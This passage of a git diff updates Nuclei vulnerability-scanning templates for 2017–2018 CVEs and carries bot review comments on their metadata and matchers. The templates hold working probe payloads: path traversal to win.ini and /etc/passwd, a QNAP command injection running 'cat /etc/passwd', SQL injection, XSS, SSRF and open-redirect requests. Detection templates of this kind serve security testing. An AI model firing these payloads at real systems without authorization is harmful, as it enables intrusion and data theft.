DNNPersonalization=WriteFileC:\Windows\win.ini + matchers-condition: and matchers: - type: word @@ -31,8 +30,7 @@ requests: - 'for 16-bit app support' part: body condition: and + - type: status status: - 404 - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000027.yaml b/nuclei-templates/CVE-2017/cve-2017-1000027.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-1000027.yaml rename to nuclei-templates/CVE-2017/cve-2017-1000027.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-11512.yaml b/nuclei-templates/CVE-2017/cve-2017-11512.yaml deleted file mode 100644 index 095801ddf9..0000000000 
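Review bot: The new side of the first CVE-2017-9822 hunk regresses the metadata: the `reference:` list that carried the NVD entry, the vendor security center and the SecurityFocus id is collapsed to a single GitHub PoC link, and the rewritten description reads "are affected to deserialization vulnerability", which the removed wording had right. `cvss-score: 8.80` is also a nonstandard spelling of the `8.8` every other template in this patch uses. Suggest keeping the removed `reference:` block and restoring `description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.` The two later hunks in this file only add `matchers-condition: and`, blank lines and remove a trailing comment.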
--- a/nuclei-templates/CVE-2017/cve-2017-11512.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2017-11512 - -info: - name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: | - ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. - reference: - - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - - https://www.tenable.com/security/research/tra-2017-31 - - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-11512 - cwe-id: CWE-22 - metadata: - shodan-query: http.title:"ManageEngine" - verified: "true" - tags: cve,cve2017,manageengine,lfr,unauth,tenable - -requests: - - method: GET - path: - - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' - - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml b/nuclei-templates/CVE-2017/cve-2017-11586.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-11586.yaml rename to nuclei-templates/CVE-2017/cve-2017-11586.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12544.yaml b/nuclei-templates/CVE-2017/cve-2017-12544.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-12544.yaml rename to nuclei-templates/CVE-2017/cve-2017-12544.yaml 
diff --git a/nuclei-templates/CVE-2017/CVE-2017-12635.yaml b/nuclei-templates/CVE-2017/cve-2017-12635.yaml
similarity index 100%
rename from nuclei-templates/CVE-2017/CVE-2017-12635.yaml
rename to nuclei-templates/CVE-2017/cve-2017-12635.yaml
diff --git a/nuclei-templates/CVE-2017/CVE-2017-14849.yaml b/nuclei-templates/CVE-2017/cve-2017-14849.yaml
similarity index 100%
rename from nuclei-templates/CVE-2017/CVE-2017-14849.yaml
rename to nuclei-templates/CVE-2017/cve-2017-14849.yaml
diff --git a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml b/nuclei-templates/CVE-2017/cve-2017-18536.yaml
similarity index 100%
rename from nuclei-templates/CVE-2017/CVE-2017-18536.yaml
rename to nuclei-templates/CVE-2017/cve-2017-18536.yaml
diff --git a/nuclei-templates/CVE-2017/cve-2017-18598.yaml b/nuclei-templates/CVE-2017/cve-2017-18598.yaml
index d030fe66cd..b7393b1790 100644
--- a/nuclei-templates/CVE-2017/cve-2017-18598.yaml
+++ b/nuclei-templates/CVE-2017/cve-2017-18598.yaml
@@ -1,34 +1,62 @@ -id: CVE-2017-18598 - -info: - name: Qards Plugin - Stored XSS and SSRF - author: pussycat0x - severity: medium - description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php - reference: - - https://wpscan.com/vulnerability/8934 - - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 - tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast - +id: CVE-2017-18598 + +info: + name: WordPress Qards - Cross-Site Scripting + author: pussycat0x + severity: medium + description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. 
+ reference: + - https://wpscan.com/vulnerability/8934 + - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 + - https://wpvulndb.com/vulnerabilities/8934 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "console.log" \ No newline at end of file + epss-score: 0.00094 + epss-percentile: 0.38554 + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: designmodo + product: qards + framework: wordpress + tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/qards/' + + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "console.log" +# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-3528.yaml b/nuclei-templates/CVE-2017/cve-2017-3528.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-3528.yaml rename to nuclei-templates/CVE-2017/cve-2017-3528.yaml 
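Review bot: `max-request: 1` no longer matches the request count: the new `flow: http(1) && http(2)` sends the `GET /` probe and then the `html2canvasproxy.php` request, so the value should be `max-request: 2` (CVE-2017-5689 in this patch uses 2 for its two raw requests) unless the counter deliberately excludes flow gates. The gate's word matcher on `/wp-content/plugins/qards/` has no `part:` and relies on the default; spelling out `part: body` makes the intent explicit. Nearly every header line is removed and re-added although `id:` and `author:` are unchanged, which suggests a line-ending or indentation rewrite; doing that normalisation separately would keep the real change reviewable. The hunk starts on the previous line.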
diff --git a/nuclei-templates/CVE-2017/CVE-2017-5521.yaml b/nuclei-templates/CVE-2017/cve-2017-5521.yaml
similarity index 100%
rename from nuclei-templates/CVE-2017/CVE-2017-5521.yaml
rename to nuclei-templates/CVE-2017/cve-2017-5521.yaml
diff --git a/nuclei-templates/CVE-2017/cve-2017-5631.yaml b/nuclei-templates/CVE-2017/cve-2017-5631.yaml
index 6dcc26746a..8f0b35c820 100644
--- a/nuclei-templates/CVE-2017/cve-2017-5631.yaml
+++ b/nuclei-templates/CVE-2017/cve-2017-5631.yaml
@@ -1,21 +1,35 @@ id: CVE-2017-5631 info: - name: CaseAware - Cross Site Scripting + name: KMCIS CaseAware - Cross-Site Scripting author: edoardottt severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: + - https://www.openbugbounty.org/incidents/228262/ + - https://www.exploit-db.com/exploits/42042/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware + epss-score: 0.00286 + epss-percentile: 0.65504 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems -requests: +http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
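Review bot: The rewritten description drops the parameter name that the removed sentence carried (`usr`), even though the request path a few lines below targets exactly that parameter. Suggest `description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the usr parameter transmitted in the login.php query string.` so the finding names what to fix. The remaining changes in this hunk are metadata and the `requests:` → `http:` migration; the matcher block lies outside this hunk.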
@@ -35,3 +49,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-5982.yaml b/nuclei-templates/CVE-2017/cve-2017-5982.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-5982.yaml rename to nuclei-templates/CVE-2017/cve-2017-5982.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-6361.yaml b/nuclei-templates/CVE-2017/cve-2017-6361.yaml new file mode 100644 index 0000000000..1f8af111ec --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-6361.yaml @@ -0,0 +1,23 @@ +id: CVE-2017-6361 + +info: + name: QNAP QTS RCE + author: medbsq + severity: critical +# https://www.cvebase.com/cve/2017/6360 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/authLogin.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "root:[x*]:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-7529.yaml b/nuclei-templates/CVE-2017/cve-2017-7529.yaml index 63d93927e1..b05d81075d 100644 --- a/nuclei-templates/CVE-2017/cve-2017-7529.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-7529.yaml 
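Review bot: The matcher in the new cve-2017-6361.yaml uses `root:[x*]:0:0:` under `type: word`, where the brackets are literal text, so the word can never occur in a real response; the sibling templates in this commit (CVE-2018-10822, CVE-2018-12909) express this check as `type: regex`, and this one should agree with them or use a literal word. The only reference is a comment pointing at `cve/2017/6360`, which does not match `id: CVE-2017-6361`; a `reference:` list led by the NVD entry for CVE-2017-6361 plus a `description` and `classification` block, as the other templates here carry, would make the file self-explanatory. `sid=SIDVALUE` in the path is an unexplained placeholder and deserves a comment on what value is expected there. The file also keeps the legacy `requests:` key while the rest of the commit migrates templates to `http:`.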
@@ -1,27 +1,29 @@ id: CVE-2017-7529 - info: - name: Nginx Remote Integer Overflow - author: medbsq + author: "Harsh Bothra" + name: "Nginx Remote Integer Overflow" severity: medium -# https://www.cvebase.com/cve/2017/7529 +# This template supports the detection part only. +# Do not test any website without permission +# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py + requests: - - method: GET - path: - - "{{BaseURL}}/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Range: bytes=-17208,-9223372036854758792 + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Range: bytes=-17208,-9223372036854758792 + Connection: close + matchers-condition: and matchers: - - type: word - words: - - "Server: nginx" - - "Content-Range" - condition: and - part: header - type: status status: - 206 + - type: word + words: + - Content-Range + part: all \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-8917.yaml b/nuclei-templates/CVE-2017/cve-2017-8917.yaml index 6fcb2274df..a4968604e8 100644 --- a/nuclei-templates/CVE-2017/cve-2017-8917.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-8917.yaml 
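Review bot: The rewritten matchers drop the `Server: nginx` header check the old `word` matcher carried, so any server that answers the malformed `Range` with a 206 and a `Content-Range` header now counts as a hit; for a template whose own comment says it is detection-only, that widens false positives. Consider keeping a header matcher alongside the status check, e.g. `- type: word`, `part: header`, `words: ["nginx"]`. The `Content-Range` word on `part: all` adds little on its own, since a 206 response carries that header by definition.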
@@ -1,15 +1,22 @@ -id: cve-2017-8917 +id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" + matchers: - type: word words: diff --git a/nuclei-templates/CVE-2017/CVE-2017-9288.yaml b/nuclei-templates/CVE-2017/cve-2017-9288.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-9288.yaml rename to nuclei-templates/CVE-2017/cve-2017-9288.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-9833.yaml b/nuclei-templates/CVE-2017/cve-2017-9833.yaml index ed4f48506c..fcdf436a30 100644 --- a/nuclei-templates/CVE-2017/cve-2017-9833.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-9833.yaml 
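Review bot: `cvss-score: 9.80` in the new `classification` block is inconsistent with the `9.8` form the same commit normalizes to elsewhere (CVE-2017-9833, CVE-2018-14502); use `cvss-score: 9.8`. The `reference` remains a bare string to cvedetails while sibling templates carry a list led by the NVD entry; `reference:` / `- https://nvd.nist.gov/vuln/detail/CVE-2017-8917` / `- https://www.cvedetails.com/cve/CVE-2017-8917/` would match them. This file also keeps `requests:` while the commit moves others to `http:`. The matchers continue past the end of the hunk.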
@@ -5,17 +5,31 @@ info: author: 0x_Akoko severity: high description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + impact: | + An attacker can gain unauthorized access to sensitive files on the server. + remediation: | + Upgrade to a patched version of BOA Web Server or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42290 - - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 + - https://pastebin.com/raw/rt7LJvyF + - https://www.exploit-db.com/exploits/42290/ + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - tags: boa,lfr,lfi,cve,cve2017 + epss-score: 0.7354 + epss-percentile: 0.98027 + cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: boa + product: boa + tags: cve,cve2017,boa,lfr,lfi,edb -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" @@ -29,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 +# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml index c737a701c8..617dcbd20c 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml 
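Review bot: The new `reference` list contains the same exploit-db entry twice (`/exploits/42290` and `/exploits/42290/`); drop one. The added `remediation` ("Upgrade to a patched version") names no version even though the `cpe` pins `0.94.14.21`; say which release fixed it or state that no vendor fix is tracked. The second hunk only swaps the `# Enhanced by` trailer for a `# digest:` line and needs nothing.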
+++ b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml @@ -1,5 +1,4 @@ id: cve-2018-0101 - info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 @@ -10,14 +9,12 @@ info: remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. tags: cve,cve2018,cisco,dos,rce - requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -34,14 +31,12 @@ requests: A - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - - type: dsl dsl: - "status_code_2 == 500" @@ -49,4 +44,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or \ No newline at end of file + condition: or diff --git a/nuclei-templates/CVE-2018/cve-2018-0296.yaml b/nuclei-templates/CVE-2018/CVE-2018-0296.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-0296.yaml rename to nuclei-templates/CVE-2018/CVE-2018-0296.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000129.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1000129.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1000129.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml new file mode 100644 index 0000000000..009d5c0c00 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2018-1000671 + +info: + name: Sympa version =>6.2.16 - Cross-Site Scripting + author: 0x_Akoko + severity: medium + description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. + reference: + - https://github.com/sympa-community/sympa/issues/268 + - https://vuldb.com/?id.123670 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000671 + cwe-id: CWE-601 + epss-score: 0.00598 + epss-percentile: 0.77958 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sympa + product: sympa + shodan-query: http.html:"sympa" + tags: cve,cve2018,redirect,sympa,debian + +http: + - method: GET + path: + - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 
4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000861.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1000861.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1000861.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10093.yaml b/nuclei-templates/CVE-2018/CVE-2018-10093.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10093.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10093.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10095.yaml b/nuclei-templates/CVE-2018/CVE-2018-10095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10095.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml b/nuclei-templates/CVE-2018/CVE-2018-10822.yaml index 64b8bf0b32..d93affb5d4 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-10822.yaml 
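Review bot: The new template's version statements contradict each other: `name` says `Sympa version =>6.2.16`, `description` says "6.2.16 and later" is affected, yet `remediation` tells users to upgrade to `>=6.2.17`, which is inside the stated affected range. Settle on one range from the linked references and write the `name` with a conventional operator, e.g. `name: Sympa >= 6.2.16 - Open Redirect`. The `name` also calls it Cross-Site Scripting while `cwe-id: CWE-601` and the `redirect` tag classify it as an open redirect; the title should match the classification and the regex matcher, which only tests the `Location` header.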
@@ -1,21 +1,19 @@ id: CVE-2018-10822 info: - name: D-Link Routers - Local File Inclusion + name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. reference: - https://www.exploit-db.com/exploits/45678 - - http://sploit.tech/2018/10/12/D-Link.html - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - - https://seclists.org/fulldisclosure/2018/Oct/36 + tags: cve,cve2018,lfi,router,dlink classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: cve,cve2018,lfi,router,dlink requests: - method: GET @@ -27,10 +25,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11227.yaml b/nuclei-templates/CVE-2018/CVE-2018-11227.yaml index 493f9b52d5..dd9501ca2f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11227.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11227.yaml 
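Review bot: This hunk changes `cvss-score: 7.5` to `7.50` and removes two references, which is the reverse of what the same commit does in CVE-2017-9833 (`7.50` to `7.5`) and CVE-2018-11227; the CVE-2018-14013 hunk has the same reversal (`6.1` to `6.10`, three references collapsed to one). The dropped `sploit.tech` and `seclists.org` links are the original disclosure and should stay unless they are dead. The new `description` also replaces the straight quotes around `GET /uir` with typographic quotes (`“GET /uir”`), introducing non-ASCII characters into an otherwise ASCII file. The regex change from `root:.*:0:0:` to `root:.*:0:0` is a loosening that nothing in the commit explains.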
@@ -6,21 +6,33 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://github.com/monstra-cms/monstra/issues + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 + epss-score: 0.02135 + epss-percentile: 0.8903 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: monstra + product: monstra_cms shodan-query: http.favicon.hash:419828698 - verified: "true" - tags: cve,cve2018,xss,mostra,mostracms,cms,edb + tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra -requests: +http: - raw: - | POST /admin/index.php?id=pages HTTP/1.1 @@ -36,8 +48,8 @@ requests: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -47,5 +59,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
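Review bot: The `tags` line now carries both the misspelled `mostra,mostracms` and the correct `monstra`; since the commit adds the correct tag, drop the misspelled ones: `tags: cve,cve2018,xss,monstra,cms,edb`. CVE-2018-11473 in this same commit has the identical leftover. The added reference `https://github.com/monstra-cms/monstra/issues` is the bare issue tracker rather than a specific issue and adds nothing beside `issues/438`.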
diff --git a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml index c99424a257..9412a5f837 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml @@ -1,25 +1,28 @@ id: CVE-2018-11231 info: - name: Opencart Divido plugin - Sql Injection + name: Opencart Divido - Sql Injection author: ritikchaddha severity: high + description: | + OpenCart Divido plugin is susceptible to SQL injection reference: - http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - tags: opencart,sqli,cve,cve2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.10 cve-id: CVE-2018-11231 cwe-id: CWE-89 - description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." + tags: cve,cve2018,opencart,sqli +variables: + num: "999999999" requests: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} - {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} redirects: true max-redirects: 2 matchers-condition: and @@ -27,7 +30,9 @@ requests: - type: word part: body words: - - "6f7c6dcbc380aac3bcba1f9fccec991e" + - '{{md5({{num}})}}' - type: status status: - 200 + +# 